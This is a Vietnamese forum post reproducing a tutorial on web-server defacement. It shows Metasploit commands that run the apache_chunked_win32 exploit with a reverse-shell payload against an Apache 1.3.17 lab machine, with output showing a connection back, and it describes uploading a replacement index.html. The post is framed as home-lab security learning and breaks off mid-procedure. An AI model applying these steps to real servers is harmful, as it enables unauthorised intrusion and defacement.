..:: CAN Entertainment | 4Rum ::..
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

..:: CAN Entertainment | 4Rum ::..

.. Xin Chào Mừng Tất Cả Các Bạn Đến Với Hệ Thống Giải Trí Trực Tuyến CAN. Nơi Đây Có Lẽ Là Nơi Thăng Hoa Cảm Xúc Của Tất Cả Mọi Lứa Tuổi ..
 
Trang ChínhGalleryTìm kiếmLatest imagesĐăng kýĐăng Nhập
Webmaster: Kim Thủy
Chat with Webmaster
Smod: Thanh Tùng
Chat with Smod
Liên Kết

DịchVCAN

>> Nghe Nhạc Online

>> Lấy Avartar Y!M

>> Album Ảnh 8/11

>> Bói Trực Tuyến

Poll
Trưng Cầu Dân Ý - Đợt 1 - Năm 2008
+ Friendship
Cac hoat dong pha hoai Web Vote_lcap43%Cac hoat dong pha hoai Web Vote_rcap
 43% [ 3 ]
+ Back2School
Cac hoat dong pha hoai Web Vote_lcap57%Cac hoat dong pha hoai Web Vote_rcap
 57% [ 4 ]
+ Enviroment
Cac hoat dong pha hoai Web Vote_lcap0%Cac hoat dong pha hoai Web Vote_rcap
 0% [ 0 ]
+ Ý kiến khác, Post tại bài bài thông báo này
Cac hoat dong pha hoai Web Vote_lcap0%Cac hoat dong pha hoai Web Vote_rcap
 0% [ 0 ]
Tổng số bầu chọn : 7
cCare

 

 

 

< class="" height="25"> Latest topics
» Drug Abuse Saint George Utah
Cac hoat dong pha hoai Web I_icon_minitimeThu Aug 04, 2011 12:10 pm by

» Find Newest Medication For
Cac hoat dong pha hoai Web I_icon_minitimeMon Aug 01, 2011 7:59 am by

» When the first Whirlpool Duet album was released in December 2001
Cac hoat dong pha hoai Web I_icon_minitimeSun Jul 31, 2011 11:38 pm by

» Folk Medicine Alternative Health
Cac hoat dong pha hoai Web I_icon_minitimeFri Jul 29, 2011 3:37 am by

» Phần mềm xem đồ họa 3D/2D và máy nghe nhạc đa phương tiện!!
Cac hoat dong pha hoai Web I_icon_minitimeWed Jul 06, 2011 9:26 pm by

» Xung Quanh Vụ ném bom nguyên tử xuống Hiroshima và Nagasaki
Cac hoat dong pha hoai Web I_icon_minitimeWed Jul 06, 2011 9:24 pm by

» GOM Player – Phần mềm chơi nhạc đa phương tiện FREE
Cac hoat dong pha hoai Web I_icon_minitimeThu Sep 23, 2010 4:03 pm by

» Phần mềm DVD-Cloner - sao chép DVD siêu tốc, chất lượng cao
Cac hoat dong pha hoai Web I_icon_minitimeThu Sep 23, 2010 3:57 pm by

» Phần mềm ghi âm cuộc gọi MX Skype Recorder
Cac hoat dong pha hoai Web I_icon_minitimeThu Sep 23, 2010 3:48 pm by


Cac hoat dong pha hoai Web Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Tác giả

constantine

[Mem] constantine
> V.I.P Super Mod < > V.I.P Super Mod

Nam
.:.Thông tin.:.

Age : 31 Registration date : 27/06/2008 Tổng số bài gửi : 515 Đến từ : Somewhere Job/hobbies : none Humor : none


Bài gửiTiêu đề: Cac hoat dong pha hoai Web Cac hoat dong pha hoai Web I_icon_minitimeTue Jul 08, 2008 9:50 am
Phần 1:
Học hỏi từ "nghệ thuật đ thị", thế giới online cũng c nhiều cch thức ph hoại lm mất đi vẻ đẹp của web server. Những kẻ ph hoại thực hiện hnh vi của mnh như thế no? Đọc bi sau bạn sẽ biết v hiểu su hơn cch lm của chng. Từ đ xy dựng cho mnh lớp bảo vệ an ton trước cc hoạt động nguy hiểm ny.

Ph hoại website của một cng ty by giờ khng cn lạ lẫm g trong giới cng nghệ. Người ta gọi những kẻ thực hiện điều ny l "tầng lớp dưới cng" của cộng đồng internet. Người ta đ đưa ra cc đnh gi về tnh hnh l đặt một file index.html vo web server bị tấn cng để xm nhập, ph hoại website khng cn qu đặc biệt. Ti năng thực thụ l những người viết m nguồn, pht hiện ra lỗ hổng để tấn cng web server đầu tin v tạo đ cho người khc pht triển tiếp. Khi những người ny cng khai ho lỗ hổng, nhiều người khc, "những đứa trẻ học ph hoại" mới bắt đầu chập chững lm lại.

Cc kiểu tấn cng loại ny trở nn kh bnh thường, giống như một chuyn gia bảo mật mạng khng biết lm cch no để tự ph trang web của mnh vậy!

Muốn bảo vệ bạn phải học cch tấn cng

Nếu muốn bảo vệ mạng my tnh khỏi cc cuộc tấn cng theo nhiều kiểu khc nhau, trước hết bạn phải biết cch chng tấn cng như thế no. Khng phải tất cả đồng nghiệp đều đồng với ti về kiến ny, nhưng sự thật l chng ta khng thể hiểu thấu được vấn đề nếu khng tự mnh bắt tay thực hiện chng. Trong trường hợp cụ thể ở đy, chng ta sẽ học cch ph một trang web như thế no. Nếu bạn đang nghin cứu cc gi trn hệ thống d tm xm nhập, bạn sẽ thấy rằng chng giống như ai đ đang upload một trang index.html ln vậy. Nếu khng, bạn sẽ phải viết v gửi đi như một người đang yu cầu trang web.
Nếu muốn thực hiện cc hoạt động ph hoại điện tử, bạn c được một số điều kiện nhất định no đ. Trước hết l phải nắm r cch thức của kiểu web server, l IIS hay Apache. Điều kiện của tường lửa cc cng ty cung cấp cho web server như một dịch vụ cho cc client c dễ ph khng, cc client c khả năng dễ xm nhập khng. Với cc client ny, phải c cổng mở trong tường lửa cho php chng truy cập được web server. C thể bạn c một firewall tầng ứng dụng ph hợp gip bảo vệ dịch vụ của mnh, nhưng đ hon ton l một vấn đề khc chng ta chưa xem xt tới ở đy.

Xem xt ton cảnh

Như chng ta đ biết, muốn khai thc hệ thống để ph hoại cần phải đp ứng được một số tiu chuẩn nhất định. Bạn c thể gọi n l hng loạt vấn đề cũng được. Liệu dịch vụ c lỗ hổng hay khng, liệu n c bộc lộ ở web hay khng, v liệu. Bạn sẽ phải vẽ ra một bức tranh cụ thể cho mnh. Những hoạt động thực tiễn chng ta sẽ lm với tất cả cc bước cần thiết để xm nhập một web server, sau đ upload phin bản index.html ring ln server. Chng ta sẽ phải ln danh sch cc hoạt động cần phải lm tương ứng với hệ điều hnh v kiểu web server.

Ti đ thực hiện cuộc ph hoại minh hoạ ny trong phng lm việc tại nh với hai laptop. Một my ci hệ điều hnh SuSE Linux, my cn lại ci Windows 2000 Professional. Trong laptop W2K ti ci web server nguồn mở Apache phin bản 1.3.17. C một số phin bản nhiều lỗ hổng khc ra đời sau 1.3.17 nhưng chng ta sẽ dng phin bản ny lm v dụ bởi v n c lỗ hổng m ho chắc chắn.

Nội dung chi tiết

Tất cả dường như c vẻ ổn, nhưng bạn mới chỉ xc định được vị tr m nguồn để khai thc? Khng chỉ c thể, bạn biết chắc chắn rằng khng c cc thnh phần "gi trị bổ sung" trong m khai thc hay khng? Để đơn giản ho ti dng Metasploit Framework. Framework ny được đặt chung với HDM v spoonm. N cn l bản miến ph dnh cho mọi người. Tnh năng nng cao khi dng cng cụ ny l bạn c thể khai thc an ton tất cả cc lỗ hổng km theo m khng phải sợ bất kỳ backdoor no. Framework ny c thể dng trong cả mi trường Linux hoặc win32. Bạn c thể c sự lựa chọn ring cho mnh, cn trong v dụ ny ti dng Linux v server tftp đang chạy trn n. Server ny sẽ được dng trong cc hoạt động minh hoạ thử nghiệm của cả bi.

Cc yu cầu cho hoạt động tấn cng một trang web đ ni ở trn gồm:

Metasploit Framework để khởi động qu trnh khai thc.
Windows 2000 Professional ci đặt Apache 1.3.17.
Hai laptop kết nối với nhau qua một switch.
Metasploit

Trong phần một chng ta sẽ xem xt sơ lược về Metasploit. Ở phần hai cc bạn sẽ được hướng dẫn chi tiết từng bước cch sử dụng. Chng ti sẽ cung cấp một số thng tin gip bạn c được sự hnh dung ban đầu về n. Trong bi ny ti dng Metasploit trong Linux.

Dưới đy l ton bộ thư mục v file tạo một lần trong Framework khng bị nn.
Chng ta c thể thấy rằng Metasploit Framework thực sự c tới 30 lỗ hổng v 33 tải trọng (payload) c thể khai thc. Rất ấn tượng! Khng chỉ thể, n cn được miễn ph trong sử dụng, khng giống như cc bản thương mại tương tự khc. Vấn đề nan giải ny sẽ tiếp tục được thực hiện ở phần sau. Chng ti sẽ đi su hơn vo cch dng Metaspoit nhằm phục vụ cho mục đch cuối cng đ đặt ra v kiến thức bảo mật my tnh của bạn.
Phần 2:
Trong phần hai của loạt bi ny chng ta sẽ xem xt kỹ hơn cch thức deface (tức ph hoại hay thay đổi lại giao diện) một trang Web hon chỉnh. Cng cụ được sử dụng ở đy l chương trnh bảo mật nguồn mở kh nổi tiếng Metasploit Framework. Phần hướng dẫn chi tiết gip bạn hiểu v tạo lại chương trnh dễ dng.

Tm tắt phần một

Chng ta sẽ tm lược vắn tắt nội dung đ nu ở phần một. Ở bi trước chng ta đ ni đến cch thức một Web server c thể bị deface như thế no v giới thiệu cng cụ sử dụng cho hoạt động thử nghiệm để tự deface l g. Trước khi tiếp tục xin được nhắc lại l cc lỗ hổng ti tạo, hay trường hợp ny l hoạt động deface Web server hon ton hợp php trong chương trnh học tập về bảo mật my tnh. Tuy nhin bạn phải lm thử nghiệm ở mi trường th nghiệm như đ nu trong phần một. Mặc d biết c nhiều điểm hạn chế, nhưng t nhất cũng thoả mn được phần no tr t m của bạn. Chng ta cũng sẽ khai thc Metasploit để hiểu su hơn về cc hoạt động deface Web server.

Từ l thuyết đến thực tế

Chng ta sẽ tiếp tục với cng cụ Metasploit v cch sử dụng n. Trước hết l tăng mức hệ thống truy cập vo Web server Apache. Khi bạn thấy lớp ngoi đảo ngược, bạn c thể upload file index.html đ được thay đổi. N sẽ trở thnh trang mặc định được đưa ln server, chẳng hạn như bản dữ liệu log của cng ty bạn.

Lựa chọn trn cho php sử dụng bất kỳ phần no bạn chọn. C nghĩa l bạn sẽ c thể thực thi bất kỳ playload no đ chọn bằng CPU của my nạn nhn khi khai thc lỗ hổng bạn đang nhắm đến. C thm lựa chọn mở rộng ny l một trong nhiều cch dng tuyệt vời của cng cụ bảo mật.

C rất nhiều lựa chọn dnh cho bạn. Ở trường hợp của chng ta l win32_reverse payload v n gip tạo ra được lớp vỏ bn ngoi, cho php sử dụng được nhiều lần khai thc để tấn cng. Để r hơn bạn c thể copy lại file index.html v điều chỉnh n bằng cch thay đổi giao diện. Xy dựng được lớp bn ngoi cho php chng ta thực hiện điều đ. Cn Framework bạn c tuỳ chọn payload th sao? Hy xem c php bn dưới:

msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >

By giờ chng ta đ thiết lập thng số cho payload v quay trở lại mn hnh lệnh. Tiếp theo l thiết lập địa chỉ IP để nhận lớp ngoi đảo ngược. Thiết lập cho host nhận cũng tương tự như một vi bước biết lập cho RHOST trước đy để đặc tả my sẽ tấn cng. Thực hiện như sau:

msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >

By giờ chng ta đ thực sự sẵn sng khởi động lỗ hổng. C php như sau:

msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
[*] Starting Reverse Handler.
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
[*] Got connection from 192.168.1.101:103
Từ trn bạn c thể thấy mn hnh lệnh trong thư mục Apache. C một tuỳ chọn khc chng ta c thể sử dụng để đặc tả hệ điều hnh đang dng trong trường hợp ny l "target". Ngay cả khi bạn khng m tả tường minh, n cũng sẽ cố gắng "thu xếp" để thực hiện những việc n c thể lm. Để dng tuỳ chọn target (đch), thực hiện như sau:
msf apache_chunked_win32(win32_reverse) > show targets
http://vinh-kien.piczo.com

Thông điệp:

--*--{Hãy cùng chia s? v?i b?n bè b?ng cách }--*--

Copy du?ng link du?i dây g?i d?n nick yahoo b?n bè!

Cac hoat dong pha hoai Web Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang

Permissions in this forum: Bạn không có quyền trả lời bài viết
..:: CAN Entertainment | 4Rum ::..  :: 

( »»--(¯`° IT World | The Gioi CNTT °´¯)--»» )

 :: 

Thủ Thuật - Mẹo Vặt

-

( »»--(¯`° Bản Quyền Của Forum Này Chỉ Thuộc Về CAN Entertainment °´¯)--»» )

Tất Cả Thời Gian Được Tính Theo GMT+7. Hôm nay: Fri May 10, 2024 6:49 pm
Designed by Huynh Kim Thuy & Pham Thanh Tung.
Developed by Canner.
Copyright © 10/2008, Can Entertainment . All rights reserved.
Powered by: phpBB 2.0
Copyright © 2008-2009 Forumotion.Com

Create a forum on Forumotion | ©phpBB | Free forum support | Báo cáo lạm dụng | Thảo luận mới nhất